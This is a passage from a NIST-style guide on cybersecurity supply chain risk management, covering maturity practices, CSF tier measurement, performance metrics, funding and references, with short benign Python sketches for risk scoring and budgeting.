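For illustration of the governance capability in the final bullet above, the sketch below pairs SBOM component data with criticality, exploitability, and vulnerability counts to rank responses; the fields and scoring rule are hypothetical assumptions, and a real implementation would consume standard SBOM formats such as SPDX or CycloneDX.

```python
# Illustrative sketch only: pairing SBOM component data with criticality and
# vulnerability information to prioritize responses. Fields and the scoring
# rule are hypothetical assumptions.
from dataclasses import dataclass

@dataclass
class Component:
    name: str
    version: str
    criticality: float     # 0.0-1.0, from criticality analysis
    exploitability: float  # 0.0-1.0, e.g., informed by threat intelligence
    known_vulns: int       # count of applicable known vulnerabilities

def priority(c: Component) -> float:
    """Naive prioritization: weight vulnerabilities by criticality and exploitability."""
    return c.known_vulns * c.criticality * c.exploitability

sbom = [
    Component("libfoo", "1.2.3", criticality=0.9, exploitability=0.8, known_vulns=2),
    Component("libbar", "4.5.6", criticality=0.3, exploitability=0.2, known_vulns=5),
]
for comp in sorted(sbom, key=priority, reverse=True):
    print(f"{comp.name} {comp.version}: priority={priority(comp):.2f}")
```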
3.4.2. Sustaining Practices
Sustaining practices should be used to enhance the efficacy of cybersecurity supply chain risk
management. These practices are inclusive of and build upon foundational practices. Enterprises
that have broadly standardized and implemented the foundational practices should consider these
as the next steps in advancing their cybersecurity supply chain risk management capabilities:
• Establish and collaborate with a threat-informed security program.
• Use confidence-building mechanisms, such as third-party assessment surveys, on-site
visits, and formal certifications (e.g., ISO 27001) to assess critical supplier security
capabilities and practices.
• Establish formal processes and intervals for continuous monitoring and reassessment of
suppliers, supplied products and services, and the supply chain itself for potential changes
to the risk profile.
• Use the enterprise’s understanding of its C-SCRM risk profile (or risk profiles specific to
mission and business areas) to define a risk appetite and risk tolerances to empower
leaders with delegated authority across the enterprise to make C-SCRM decisions in
alignment with the enterprise’s mission imperatives and strategic goals and objectives.
• Use a formalized information-sharing function to engage with ISACs, the FASC, and
other government agencies to enhance the enterprise’s supply chain cybersecurity threat
and risk insights and help ensure a coordinated and holistic approach to addressing
cybersecurity risks throughout the supply chain that may affect a broader set of agencies,
the private sector, or national security.
• Coordinate with the enterprise’s cybersecurity program leadership to elevate top C-
SCRM Risk Profile risks to the most senior enterprise risk committee.
• Embed C-SCRM-specific training into the training curriculums of applicable roles across
the enterprise processes involved with C-SCRM, including information security,
procurement, risk management, engineering, software development, IT, legal, and HR.
• Integrate C-SCRM considerations into every aspect of the system and product life cycle,
and implement consistent, well-documented, repeatable processes for systems
engineering, cybersecurity practices, and acquisition.
• Integrate the enterprise’s defined C-SCRM requirements into the contractual language
found in agreements with suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers.
• Include critical suppliers in contingency planning, incident response, and disaster
recovery planning and testing.
• Engage with suppliers, developers, system integrators, external system service providers,
and other ICT/OT-related service providers to improve their cybersecurity practices.
• Define, collect, and report C-SCRM metrics to ensure risk-aware leadership, enable
active management of the completeness of C-SCRM implementations, and drive the
efficacy of the enterprise's C-SCRM processes and practices.

32 For purposes of this publication, the term original equipment manufacturers is inclusive of original component manufacturers.
3.4.3. Enhancing Practices
Enhancing practices should be applied by the enterprise with the goal of advancing toward
adaptive and predictive C-SCRM capabilities. Enterprises should pursue these practices once
sustaining practices have been broadly implemented and standardized across the enterprise:
• Automate C-SCRM processes where applicable and practical to drive consistency and
efficiency of execution and to make available the critical resources required for other
C-SCRM activities.
• Adopt quantitative risk analyses that apply probabilistic approaches (e.g., Bayesian
analysis) to reduce uncertainty about the likelihood and impact of cybersecurity risks
throughout the supply chain, optimize the allocation of resources to risk response, and
measure return on investment (i.e., response effectiveness). An illustrative sketch
follows this list.
• Apply insights gained from leading C-SCRM metrics (i.e., forward-looking indicators) to
shift from reactive to predictive C-SCRM strategies and plans that adapt to risk profile
changes before they occur.
• Establish or participate in a community of practice (e.g., Center of Excellence) as
appropriate to enhance and improve C-SCRM practices.
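The sketch referenced in the quantitative risk analysis bullet above follows: a single Bayesian update of the estimated likelihood of a supplier compromise given an observed indicator. The prior and the indicator's true- and false-positive rates are hypothetical assumptions.

```python
# Illustrative sketch only: a single-step Bayesian update of the estimated
# likelihood of a supply chain compromise given an observed indicator.
# The prior, true-positive, and false-positive rates are hypothetical.

def bayes_update(prior: float, p_obs_given_event: float, p_obs_given_no_event: float) -> float:
    """P(event | observation) via Bayes' theorem."""
    numerator = p_obs_given_event * prior
    denominator = numerator + p_obs_given_no_event * (1.0 - prior)
    return numerator / denominator

prior = 0.02  # hypothetical prior annual likelihood of supplier compromise
tpr = 0.80    # P(indicator observed | compromise)
fpr = 0.05    # P(indicator observed | no compromise)
posterior = bayes_update(prior, tpr, fpr)
print(f"Posterior likelihood after indicator: {posterior:.3f}")  # ~0.246
```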
The guidance and controls contained in this publication are built on existing multidisciplinary
practices and are intended to increase the ability of enterprises to strategically manage
cybersecurity risks throughout the supply chain over the entire life cycle of systems, products,
and services. Refer to Table 3-3 for a summary of C-SCRM key practices.
3.5. Capability Implementation Measurement and C-SCRM Measures
Enterprises should actively manage the efficiency and effectiveness of their C-SCRM programs
through ongoing measurement of the programs themselves. Enterprises can use several methods
to measure and manage the effectiveness of their C-SCRM program:
• Using a framework, such as the NIST CSF, to assess their C-SCRM capabilities
• Measuring the progress of their C-SCRM initiatives toward completion
• Measuring the performance of their C-SCRM initiatives toward desired outcomes
All methods rely on a variety of data collection, analysis, contextualization, and reporting
activities. Collectively, these methods should be used to track and report progress and results that
ultimately indicate reductions in risk exposure and improvements in the enterprise’s security
outcomes.
C-SCRM performance management provides multiple enterprise and financial benefits. Major
benefits include increasing stakeholder accountability for C-SCRM performance; improving the
effectiveness of C-SCRM activities; demonstrating compliance with laws, rules, and regulations;
providing quantifiable inputs for resource allocation decisions; and cost avoidance associated
with a reduced impact from, or a reduced likelihood of experiencing, a cyber supply chain incident.
Enterprises can use a framework to baseline their C-SCRM capabilities, such as NIST CSF
Implementation Tiers, which provide a useful context for an enterprise to track and gauge the
increasing rigor and sophistication of their C-SCRM practices. Progression against framework
topics is measured using ordinal (i.e., 1-4) scales that illustrate the progression of capabilities
across tiers. The following are examples of how C-SCRM capabilities could be gauged by
applying NIST CSF Tiers (an illustrative sketch follows the list):
• CSF Tier 1: The enterprise does not understand its exposure to cybersecurity risks
throughout the supply chain or its role in the larger ecosystem. The enterprise does not
collaborate with other entities or have processes in place to identify, assess, and mitigate
cybersecurity risks throughout the supply chain.
• CSF Tier 2: The enterprise understands its cybersecurity risks throughout the supply
chain and its role in the larger ecosystem. The enterprise has not internally formalized its
capabilities to manage cybersecurity risks throughout the supply chain or its capability to
engage and share information with entities in the broader ecosystem.
• CSF Tier 3: The enterprise-wide approach to managing cybersecurity risks throughout
the supply chain is enacted via enterprise risk management policies, processes, and
procedures. This likely includes a governance structure (e.g., Risk Council) that balances
the management of cybersecurity risks throughout the supply chain with other enterprise
risks. Policies, processes, and procedures are consistently implemented as intended and
continuously monitored and reviewed. Personnel possess the knowledge and skills to
perform their appointed cybersecurity supply chain risk management responsibilities. The
enterprise has formal agreements in place to communicate baseline requirements to its
suppliers and partners. The enterprise understands its external dependencies and
collaborates with partners to share information to enable risk-based management
decisions within the enterprise in response to events.
• CSF Tier 4: The enterprise actively consumes and distributes information with partners
and uses real-time or near real-time information to improve cybersecurity and supply
chain security before an event occurs. The enterprise leverages institutionalized
knowledge of cybersecurity supply chain risk management with its external suppliers and
partners, internally in related functional areas, and at all levels of the enterprise. The
enterprise communicates proactively using formal (e.g., agreements) and informal
mechanisms to develop and maintain strong relationships with its suppliers, buyers, and
other partners.
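The sketch mentioned above records ordinal tier ratings per C-SCRM topic and flags topics below a target tier; the topic names and target are hypothetical assumptions.

```python
# Illustrative sketch only: recording ordinal CSF Implementation Tier ratings
# (1-4) per C-SCRM topic and gauging progression toward a target tier.
# Topic names and the target tier are hypothetical assumptions.

tier_ratings = {
    "external participation / information sharing": 2,
    "supplier risk assessment": 3,
    "governance and policy": 3,
    "incident response with suppliers": 1,
}

TARGET_TIER = 3  # hypothetical target state
gaps = {topic: TARGET_TIER - tier for topic, tier in tier_ratings.items() if tier < TARGET_TIER}
print("Topics below target:", gaps)
```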
Building capabilities begins by establishing a solid programmatic foundation that includes
enabling strategies and plans, establishing policies and guidance, investment in training, and
dedicating program resources. Once this foundational capability is in place, enterprises can use
these progression charts to orient the strategic direction of their programs to target states of C-
SCRM capabilities in different areas of the program. Table 3-3 provides an example C-SCRM
implementation model.
Table 3-3: Example C-SCRM Practice Implementation Model33

Foundational
• Establish a C-SCRM PMO
• Obtain leadership support for C-SCRM
• C-SCRM policies across enterprise levels
• Define C-SCRM hierarchy
• C-SCRM governance structure
• Well-documented, consistent C-SCRM processes
• Establish a C-SCRM-aware culture
• Quality and reliability program
• Integrate C-SCRM into acquisition/procurement policies
• Determine FIPS 199 impact levels
• Explicit roles for C-SCRM
• Adequate and dedicated C-SCRM resources
• Defined C-SCRM control baseline
• C-SCRM internal checks and balances to assure compliance
• Supplier management program
• C-SCRM included in an established incident management program
• Processes to ensure suppliers disclose vulnerabilities

Sustaining
• Threat-informed security program
• Use of third-party assessments, site visits, and formal certification
• Formal supplier monitoring program
• Defined C-SCRM risk appetite and risk tolerances
• Formalized information-sharing processes (e.g., engages w/ FASC)
• Regular reporting of C-SCRM risks to executives/risk committees
• Formal C-SCRM training program
• C-SCRM integrated into SDLC
• C-SCRM integrated into contractual agreements
• Suppliers participate in incident response, disaster recovery, and contingency planning
• Collaborate with suppliers to improve their cybersecurity practices
• Formally defined, collected, and reported C-SCRM metrics

Enhancing
• C-SCRM process automation
• Use quantitative risk analysis
• Predictive and adaptive C-SCRM strategies and processes
• Establish or participate in a community of practice

33 For more information on C-SCRM capabilities, refer to Section 1.5, C-SCRM Key Practices.
3.5.1. Measuring C-SCRM Through Performance Measures
Fig. 3-1: C-SCRM Metrics Development Process
Enterprises typically rely on information security measures to facilitate decision-making and
improve performance and accountability in their information security programs. Enterprises can
achieve similar benefits within their C-SCRM programs. Additionally, enterprises should report
C-SCRM metrics to the board through the ERM process. Figure 3-1 illustrates the process for
developing metrics, as outlined in [NIST SP 800-55, Rev. 1], which includes:
• Stakeholder Interest Identification: Identify the primary (e.g., CISO, CIO, CTO) and
secondary C-SCRM stakeholders (e.g., CEO/Head of Agency, COO, CFO), and
define/measure requirements based on the context required for each stakeholder or
stakeholder group.
• Goals and Objectives Definition: Identify and document enterprise strategic and C-
SCRM-specific performance goals and objectives. These goals may be expressed in the
form of enterprise strategic plans, C-SCRM policies, requirements, laws, regulations, etc.
• C-SCRM Policies, Guidelines, and Procedure Review: Identify the desired C-SCRM
practices, controls, and expectations outlined within these documents and used to
guide/implement C-SCRM across the enterprise.
• C-SCRM Program Implementation Review: Collect any existing data, measures, and
evidence that can provide insights used to derive new measures. These may be found in
C-SCRM Plans, POA&Ms, supplier assessments, etc.
• Level of Implementation: Develop and map measures to the identified C-SCRM
standards, policies, and procedures to demonstrate the program’s implementation
progress. These measures should be considered when rendering decisions to prioritize
and invest in C-SCRM capabilities.
• C-SCRM Program Results on Efficiency and Effectiveness: Develop and map
measures of C-SCRM’s efficiency and effectiveness to the identified strategy and policy
objectives to gauge whether desired C-SCRM outcomes are met. These measures should
be considered part of policy refreshes.
• Business and Mission Impact: Develop and map measures to the identified enterprise
strategic and C-SCRM-specific objectives to offer insight into the impact of C-SCRM
(e.g., contribution to business process cost savings; reduction in national security risk).
These measures should be considered a component of goal and objective refreshes.
Similar to information security measures, C-SCRM-focused measures can be attained at different
levels of an enterprise. Table 3-4 provides example measurement topics across the three Risk
Management levels.
Table 3-4: Example Measurement Topics Across the Risk Management Levels

Level 1
• Policy adoption at lower levels
• Timeliness of policy adoption at lower levels
• Adherence to risk appetite and tolerance statements
• Differentiated levels of risk exposure across Level 2
• Compliance with regulatory mandates
• Adherence to customer requirements

Level 2
• Effectiveness of mitigation strategies
• Time allocation across C-SCRM activities
• Mission and business process-level risk exposure
• Degree and quality of C-SCRM requirement adoption in mission and business processes
• Use of a C-SCRM PMO by Level 3

Level 3
• Design effectiveness of controls
• Operating effectiveness of controls
• Cost efficiency of controls
Enterprises should validate identified C-SCRM goals and objectives with their targeted
stakeholder groups prior to beginning an effort to develop specific measures. When developing
C-SCRM measures, enterprises should focus on the stakeholder’s highest priorities and target
measures based on data that can be realistically sourced and gathered. Each established measure
should have a specified performance target used to gauge whether goals and objectives in
relation to that measure are being met. Enterprises should consider the use of measures templates
to formalize each measure and serve as a source of reference for all information pertaining to that
measure. Finally, enterprises should develop a formal feedback loop with stakeholders to ensure
that measures are continually providing the desired insights and remain aligned with the
enterprise’s overall strategic objectives for C-SCRM.
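For illustration, a measure template of the kind described above might be formalized as follows; the field names and example values are hypothetical assumptions.

```python
# Illustrative sketch only: a measure template that formalizes a C-SCRM
# performance measure and its target. Field names and values are hypothetical.
from dataclasses import dataclass

@dataclass
class MeasureTemplate:
    name: str
    stakeholder: str   # e.g., "CISO"
    goal: str          # linked strategic or C-SCRM objective
    data_source: str   # where the measure is realistically sourced
    formula: str       # how the measure is computed
    target: float      # performance target used to gauge success
    frequency: str     # collection/reporting cadence

measure = MeasureTemplate(
    name="Critical suppliers with completed risk assessment",
    stakeholder="CISO",
    goal="Assess and monitor critical suppliers",
    data_source="Supplier assessment repository",
    formula="assessed_critical_suppliers / total_critical_suppliers",
    target=0.95,
    frequency="quarterly",
)
actual = 0.88
print("On target" if actual >= measure.target else "Below target")
```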
3.6. Dedicated Resources
To appropriately manage cybersecurity risks throughout the supply chain, enterprises should
dedicate funds toward this effort. Identifying resource needs and taking steps to secure adequate,
recurring, and dedicated funding are essential activities that need to be built into
the C-SCRM strategy and implementation planning effort and incorporated into an enterprise's
budgeting, investment review, and funds management processes. Access to adequate resources is
a key enabler for the establishment and sustainment of a C-SCRM program capability.
Where feasible, enterprises should be encouraged to leverage existing fund sources to improve
their C-SCRM posture. The continued availability of dedicated funds will allow enterprises to
sustain, expand, and mature their capabilities over time.
Securing and assigning C-SCRM funding is representative of leadership’s commitment to the
importance of C-SCRM, its relevance to national and economic security, and ensuring the
protection, continuity, and resilience of mission and business processes and assets.
Funding facilitates goal and action-oriented planning. Examining resource needs and allocating
funding prompts a budgeting and strategic-planning process. Effective enterprises begin by
defining a set of goals and objectives upon which to build a strategic roadmap, laying out the
path to achieving them through the assignment and allocation of finite resources. The
establishment of dedicated funding tied to C-SCRM objectives sets conditions for accountability
of performance and compels responsible staff to be efficient and effective and to adopt a
mindset of continuously seeking to improve C-SCRM capabilities and achieve security-enhancing
outcomes.
Obtaining new or increased funding can be a challenge as resources are often scarce and
necessary for many competing purposes. The limited nature of funds forces prioritization. C-
SCRM leaders need to first examine what can be accomplished within the constraints of existing
resources and be able to articulate, prioritize, and defend their requests for additional resources.
For new investment proposals, this requires a reconciliation of planned initiatives against the
enterprise’s mission and business objectives. When well-executed, a systematic planning process
can tighten the alignment of C-SCRM processes to these objectives.
Many C-SCRM processes can and should be built into existing program and operational
activities and may be adequately performed using available funds. However, there may be a need
for an influx of one-time resources to establish an initial C-SCRM program capability. For
example, this might include the need to hire new personnel with expertise in C-SCRM, acquire
contractor support to aid in developing C-SCRM program guidance, or develop content for role-
based C-SCRM training. There may also be insufficient resources in place to satisfy all recurring
C-SCRM program needs. Existing funds may need to be reallocated toward C-SCRM efforts or
new or additional funds requested. Enterprises should also seek out opportunities to leverage
shared services whenever practical.
The use of shared services can optimize the use of scarce resources and concentrate capability
into centers of excellence that provide cost-efficient access to services, systems, or tools.
Enterprises can adopt cost-sharing mechanisms across their lower-level entities that allow cost-
efficient access to C-SCRM resources and capabilities. Enterprises that pursue shared-services
models for C-SCRM should also be aware of the challenges of such models. Shared services
(e.g., C-SCRM PMO) are most effective when the enterprise at large relies on a fairly
homogenous set of C-SCRM strategies, policies, and processes. In many instances, the
centralized delivery of C-SCRM services requires a robust technology infrastructure. The
enterprise’s systems should be able to support process automation and centralized delivery in
order to fully realize the benefits of a shared-services model.
Consultation with budget/finance officials is critical to understanding what options may be
available and viable in the near term and out-years. These officials can also advise on how best
to justify needs, as well as the timeframes and processes for requesting new funds. There are
likely different processes to follow for securing recurring funds versus requesting one-time
funding. For example, funding for a new information system to support a C-SCRM capability
may involve the development of a formal business case presented to an enterprise’s investment
review board for approval. Organizations may find it helpful to break out resource needs into
ongoing and one-time costs or into cost categories that align with budget formulation, resource
decision-making, and the allocation and management of available funds.
It is recommended that the C-SCRM PMO have the lead responsibility of coordinating with
mission and business process and budget officials to build out and maintain a multi-year C-
SCRM program budget that captures both recurring and non-recurring resource requirements and
maps those requirements to available funding and fund sources. To understand the amount of
funding required, when, and for what purpose, enterprises should identify and assess which type
and level of resources (people or things) are required to implement a C-SCRM program
capability and perform required C-SCRM processes on an ongoing basis. The cost associated
with each of these identified resource needs would then be captured, accumulated, and reflected
in a budget that includes line items for relevant cost categories, such as personnel costs,
contracts, training, travel, tools, or systems. This will provide the enterprise with a baseline
understanding of what can be accomplished within existing resource levels and where there are
gaps in need of being filled. The actual allocation of funds may be centralized in a single C-
SCRM budget or dispersed across the enterprise and reflected in individual office or mission and
business process-area budgets. Regardless of how funds are actually assigned, a centralized
picture of the C-SCRM budget and funds status will provide a valuable source of information
that justifies new requests, informs prioritization decisions, and adjusts expectations about
certain activities and the duration in which they can be accomplished.
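A minimal sketch of a C-SCRM budget broken into recurring and one-time line items with a simple funding-gap check appears below; the cost categories, amounts, and available-funds figure are hypothetical assumptions.

```python
# Illustrative sketch only: a multi-year C-SCRM budget broken into recurring
# and one-time line items by cost category, with a simple funding-gap check.
# Categories, amounts, and the available-funds figure are hypothetical.
from collections import defaultdict

line_items = [
    # (category, amount, recurring?)
    ("personnel", 450_000, True),
    ("contracts", 200_000, True),
    ("training", 40_000, True),
    ("tools_and_systems", 120_000, False),  # one-time, e.g., new system buildout
]

totals = defaultdict(float)
for category, amount, recurring in line_items:
    totals["recurring" if recurring else "one_time"] += amount

AVAILABLE_FUNDS = 700_000  # hypothetical allocated funding
requested = sum(totals.values())
print(dict(totals), "gap:", max(0, requested - AVAILABLE_FUNDS))
```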
Ensuring that C-SCRM program funding is distinctly articulated within the enterprise’s budget –
with performance measures linked to the funding – will drive accountability for results. The
visible dedication of funds in budget requests, performance plans, and reports compels leadership
attention on C-SCRM processes and the accomplishment of objectives. Budgets must be
requested and justified on a periodic basis. This process allows leadership and oversight officials
to trace and measure the effectiveness and efficiency of allocated resources. This, in turn, serves
as a driving function for program and operational C-SCRM personnel to track and manage their
performance.
Key Takeaways34
C-SCRM in Acquisition. The integration of C-SCRM into acquisition activities is critical to the
success of any C-SCRM program. C-SCRM requirements should be embedded throughout the
acquisition life cycle. The C-SCRM activities include performing risk assessments of services,
suppliers, and products; identifying relevant C-SCRM controls; conducting due diligence; and
continuously monitoring suppliers.
Supply Chain Information Sharing. Enterprises will gain access to information critical to
understanding and mitigating cybersecurity risks throughout the supply chain by building
information-sharing processes and activities into C-SCRM programs. Enterprises should engage
with peers, business partners, suppliers, and information-sharing communities (e.g., ISACs) to
gain insight into cybersecurity risks throughout the supply chain and learn from the experiences
of the community at large.
C-SCRM Awareness and Training. Enterprises should adopt enterprise-wide and role-based
training programs to educate users on the potential impact that cybersecurity risks throughout the
supply chain can have on the business and how to adopt best practices for risk mitigation. Robust
C-SCRM training is a key enabler for enterprises as they shift toward a C-SCRM-aware culture.
C-SCRM Key Practices. This publication outlines several Foundational, Sustaining, and
Enhancing C-SCRM practices that enterprises should adopt and tailor to their unique contexts.
Enterprises should prioritize reaching a base level of maturity in key practices before focusing on
advanced C-SCRM capabilities.
Capability Implementation Measurement and C-SCRM Measures. Enterprises should
actively manage the efficiency and effectiveness of their C-SCRM programs. First, enterprises
should adopt a C-SCRM framework as the basis for measuring their progress toward C-SCRM
objectives. Next, enterprises should create and implement quantitative performance measures
and target tolerances that provide periodic insight into the enterprise's progress through the
lens of specific operational objectives.
Dedicated Resources. Where possible and applicable, enterprises should commit dedicated
funds to C-SCRM. The benefits of doing so include facilitating strategic and goal-oriented
planning, driving accountability of internal stakeholders to execute and mature the C-SCRM
practices of the enterprise, and the continuous monitoring of progress by enterprise leadership.
34 Key takeaways describe key points from the section text. Refer to the Glossary in Appendix H for definitions.
REFERENCES
[CISA SCRM WG3] Cybersecurity and Infrastructure Security Agency – Working Group 3 (2021)
Mitigating ICT Supply Chain Risks with Qualified Bidder and Manufacturer Lists
(Arlington, Virginia). Available at
https://www.cisa.gov/sites/default/files/publications/ICTSCRMTF_Qualified-Bidders-
Lists_508.pdf
[COSO 2011] Rittenberg L, Martens F (2012) Enterprise Risk Management: Understanding and
Communicating Risk Appetite. (Committee of Sponsoring Organizations of the Treadway
Commission), Thought Leadership in ERM. Available at
https://www.coso.org/Documents/ERM-Understanding-and-Communicating-Risk-
Appetite.pdf
[COSO 2020] Martens F, Rittenberg L (2020) Risk Appetite – Critical to Success: Using Risk
Appetite To Thrive in a Changing World. (Committee of Sponsoring Organization of the
Treadway Commission), Thought Leadership in ERM. Available at
https://www.coso.org/Documents/COSO-Guidance-Risk-Appetite-Critical-to-Success.pdf
[Defense Industrial Base Assessment: Counterfeit Electronics] Bureau of Industry and Security,
Office of Technology Evaluation (2010) Defense Industrial Base Assessment: Counterfeit
Electronics. (U.S. Department of Commerce, Washington, D.C.). Available at
https://www.bis.doc.gov/index.php/documents/technology-evaluation/37-defense-
industrial-base-assessment-of-counterfeit-electronics-2010/file
[FedRAMP] General Services Administration (2022) FedRAMP. Available at
http://www.fedramp.gov/
[GAO] Government Accountability Office (2020) Information Technology: Federal Agencies
Need to Take Urgent Action to Manage Supply Chain Risks. (U.S. Government
Accountability Office, Washington D.C.), Report to Congressional Requesters GAO-21-
171. Available at https://www.gao.gov/assets/gao-21-171.pdf
[CNSSI 4009] Committee on National Security Systems (2015) Committee on National Security
Systems (CNSS) Glossary (CNSS, Ft. Meade, Md.), CNSSI 4009-2015. Available at
https://www.cnss.gov/CNSS/issuances/Instructions.cfm
[EO 14028] Executive Order 14028 (2021) Improving the Nation’s Cybersecurity. (The White
House, Washington, DC), DCPD-202100401, May 12, 2021.
https://www.govinfo.gov/app/details/DCPD-202100401
[FASCA] Federal Acquisition Supply Chain Security Act of 2018 (FASCA), Title II of the
Strengthening and Enhancing Cyber-capabilities by Utilizing Risk Exposure Technology
Act (SECURE) Technology Act of 2018, Pub. L. 115-390, 132 Stat. 5173. Available at
https://www.congress.gov/115/plaws/publ390/PLAW-115publ390.pdf
[FIPS 199] National Institute of Standards and Technology (2004) Standards for Security
Categorization of Federal Information and Information Systems. (U.S. Department of
Commerce, Washington, DC), Federal Information Processing Standards Publication
(FIPS) 199. https://doi.org/10.6028/NIST.FIPS.199
[FIPS 200] National Institute of Standards and Technology (2006) Minimum Security
Requirements for Federal Information and Information Systems. (U.S. Department of
Commerce, Washington, DC), Federal Information Processing Standards Publication
(FIPS) 200. https://doi.org/10.6028/NIST.FIPS.200
[FSP] Cyber Risk Institute (2020) Financial Services Cybersecurity Framework Profile Version
1.0. Available at https://cyberriskinstitute.org/the-profile/
[ISO 9000] International Organization for Standardization (2015) ISO 9000:2015 — Quality
management — Fundamentals and vocabulary (ISO, Geneva). Available at
https://www.iso.org/standard/45481.html
[ISO 28001] International Organization for Standardization (2007) ISO 28001:2007 — Security
management systems for the supply chain — Best practices for implementing supply chain
security, assessments and plans — Requirements and guidance (ISO, Geneva). Available at
https://www.iso.org/standard/45654.html
[ISO Guide 73] International Organization for Standardization (2009) ISO Guide 73:2009 —
Risk management — Vocabulary (ISO, Geneva). Available at
https://www.iso.org/standard/44651.html
[ISO/IEC 2382] International Organization for Standardization/International Electrotechnical
Commission (2015) ISO/IEC 2382:2015 — Information technology — Vocabulary (ISO,
Geneva). Available at https://www.iso.org/standard/63598.html
[ISO/IEC 20243] International Organization for Standardization/International Electrotechnical
Commission (2018) ISO/IEC 20243-1:2018 – Information technology — Open Trusted
Technology ProviderTM Standard (O-TTPS) — Mitigating maliciously tainted and
counterfeit products Part 1: Requirements and recommendations (ISO, Geneva). Available
at https://www.iso.org/standard/74399.html
[ISO/IEC 27000] International Organization for Standardization/International Electrotechnical
Commission (2018) ISO/IEC 27000:2018 – Information technology – Security techniques –
Information security management systems – Overview and vocabulary (ISO, Geneva).
Available at https://www.iso.org/standard/73906.html
[ISO/IEC 27002] International Organization for Standardization/International Electrotechnical
Commission (2022) ISO/IEC 27002:2022 – Information security, cybersecurity and
privacy protection – Information security controls (ISO, Geneva). Available at
https://www.iso.org/standard/75652.html
[ISO/IEC 27036] International Organization for Standardization/International Electrotechnical
Commission (2014) ISO/IEC 27036-2:2014 – Information technology – Security
techniques – Information security for supplier relationships – Part 2: Requirements (ISO,
Geneva). Available at https://www.iso.org/standard/59680.html
[ISO/IEC/IEEE 15288] International Organization for Standardization/International
Electrotechnical Commission/Institute of Electrical and Electronics Engineers (2015)
ISO/IEC/IEEE 15288:2015 — Systems and software engineering — System life cycle
processes (ISO, Geneva). Available at https://www.iso.org/standard/63711.html
[ITIL Service Strategy] Cannon D (2011) ITIL Service Strategy (The Stationery Office, London),
2nd Ed.
[NDIA] National Defense Industrial Association System Assurance Committee (2008)
Engineering for System Assurance. (NDIA, Arlington, VA). Available at
https://www.ndia.org/-/media/sites/ndia/meetings-and-events/divisions/systems-
engineering/sse-committee/systems-assurance-guidebook.ashx
[NIST CSF] National Institute of Standards and Technology (2018) Framework for Improving
Critical Infrastructure Cybersecurity, Version 1.1. (National Institute of Standards and
Technology, Gaithersburg, MD). https://doi.org/10.6028/NIST.CSWP.04162018
[NIST SCRM Proceedings 2012] National Institute of Standards and Technology (2012)
Summary of the Workshop on Information and Communication Technologies Supply Chain
Risk Management. Available at
https://tsapps.nist.gov/publication/get_pdf.cfm?pub_id=913338
[NIST SP 800-16] deZafra DE, Pitcher SI, Tressler JD, Ippolito JB (1998) Information
Technology Security Training Requirements: a Role- and Performance-Based Model.
(National Institute of Standards and Technology, Gaithersburg, MD), NIST Special
Publication (SP) 800-16. https://doi.org/10.6028/NIST.SP.800-16
[NIST SP 800-30 Rev. 1] Joint Task Force Transformation Initiative (2012) Guide for
Conducting Risk Assessments. (National Institute of Standards and Technology,
Gaithersburg, MD), NIST Special Publication (SP) 800-30, Rev. 1.
https://doi.org/10.6028/NIST.SP.800-30r1
[NIST SP 800-32] Kuhn DR, Hu VC, Polk WT, Chang S-jH (2001) Introduction to Public Key
Technology and the Federal PKI Infrastructure. (National Institute of Standards and
Technology, Gaithersburg, MD), NIST Special Publication (SP) 800-32.
https://doi.org/10.6028/NIST.SP.800-32
[NIST SP 800-34 Rev. 1] Swanson MA, Bowen P, Phillips AW, Gallup D, Lynes D (2010)
Contingency Planning Guide for Federal Information Systems. (National Institute of
Standards and Technology, Gaithersburg, MD), NIST Special Publication (SP) 800-34,
Rev. 1, Includes updates as of November 11, 2010. https://doi.org/10.6028/NIST.SP.800-34r1
[NIST SP 800-37] Joint Task Force (2018) Risk Management Framework for Information
Systems and Organizations: A System Life Cycle Approach for Security and Privacy.
(National Institute of Standards and Technology, Gaithersburg, MD), NIST Special
Publication (SP) 800-37, Rev. 2. https://doi.org/10.6028/NIST.SP.800-37r2
[NIST SP 800-39] Joint Task Force Transformation Initiative (2011) Managing Information
Security Risk: Organization, Mission, and Information System View. (National Institute of
Standards and Technology, Gaithersburg, MD), NIST Special Publication (SP) 800-39.
https://doi.org/10.6028/NIST.SP.800-39
[NIST SP 800-53 Rev. 5] Joint Task Force (2020) Security and Privacy Controls for Information
Systems and Organizations. (National Institute of Standards and Technology, Gaithersburg,
MD), NIST Special Publication (SP) 800-53, Rev. 5. Includes updates as of December 10,
2020. https://doi.org/10.6028/NIST.SP.800-53r5
[NIST SP 800-53A Rev. 5] Joint Task Force (2022) Assessing Security and Privacy Controls in
Information Systems and Organizations. (National Institute of Standards and Technology,
Gaithersburg, MD), NIST Special Publication (SP) 800-53A, Rev. 5.
https://doi.org/10.6028/NIST.SP.800-53Ar5
[NIST SP 800-53B] Joint Task Force (2020) Control Baselines for Information Systems and
Organizations. (National Institute of Standards and Technology, Gaithersburg, MD), NIST
Special Publication (SP) 800-53B, Includes updates as of December 10, 2020.
https://doi.org/10.6028/NIST.SP.800-53B
[NIST SP 800-55 Rev. 1] Chew E, Swanson MA, Stine KM, Bartol N, Brown A, Robinson W
(2008) Performance Measurement Guide for Information Security. (National Institute of
Standards and Technology, Gaithersburg, MD), NIST Special Publication (SP) 800-55,
Rev. 1. https://doi.org/10.6028/NIST.SP.800-55r1
[NIST SP 800-64] Kissel R, Stine KM, Scholl MA, Rossman H, Fahlsing J, Gulick, J (2008)
Security Considerations in the System Development Life Cycle. (National Institute of
Standards and Technology, Gaithersburg, MD), (Withdrawn) NIST Special Publication
(SP) 800-64 Rev. 2. https://doi.org/10.6028/NIST.SP.800-64r2
[NIST SP 800-100] Bowen P, Hash J, Wilson M (2006) Information Security Handbook: A
Guide for Managers. (National Institute of Standards and Technology, Gaithersburg, MD),
NIST Special Publication (SP) 800-100, Includes updates as of March 7, 2007.
https://doi.org/10.6028/NIST.SP.800-100
[NIST SP 800-115] Scarfone KA, Souppaya MP, Cody A, Orebaugh AD (2008) Technical
Guide to Information Security Testing and Assessment. (National Institute of Standards
and Technology, Gaithersburg, MD), NIST Special Publication (SP) 800-115.
https://doi.org/10.6028/NIST.SP.800-115
[NIST SP 800-160 Vol. 1] Ross RS, Oren JC, McEvilley M (2016) Systems Security
Engineering: Considerations for a Multidisciplinary Approach in the Engineering of
Trustworthy Secure Systems. (National Institute of Standards and Technology,
Gaithersburg, MD), NIST Special Publication (SP) 800-160, Vol. 1, Includes updates as of
March 21, 2018. https://doi.org/10.6028/NIST.SP.800-160v1
[NIST SP 800-160 Vol. 2] Ross RS, Pillitteri VY, Graubart R, Bodeau D, McQuaid R (2021)
